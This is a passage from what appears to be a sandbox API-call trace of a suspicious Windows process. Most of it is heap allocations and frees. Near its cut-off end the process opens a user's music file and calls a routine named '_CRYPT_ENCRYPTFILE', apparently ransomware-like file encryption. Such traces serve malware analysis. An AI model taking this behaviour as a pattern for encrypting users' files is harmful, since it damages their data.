(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0111.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0111.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0111.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0111.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0111.197] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0111.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca3d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0111.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.197] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0111.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0111.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0111.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0111.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0111.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0111.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0111.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0111.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0111.198] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav" (normalized: "c:\\users\\fd1hvy\\music\\xjgb9.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0111.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0111.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0111.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0111.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0111.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0111.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0111.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0111.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0111.200] FreeLibrary (hLibModule=0x772d0000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0111.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0111.201] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.201] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0111.202] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0111.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0111.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0111.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0111.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0111.204] CloseHandle (hObject=0x298) returned 1 [0111.204] FreeLibrary (hLibModule=0x772d0000) returned 1 [0111.204] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0111.204] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, 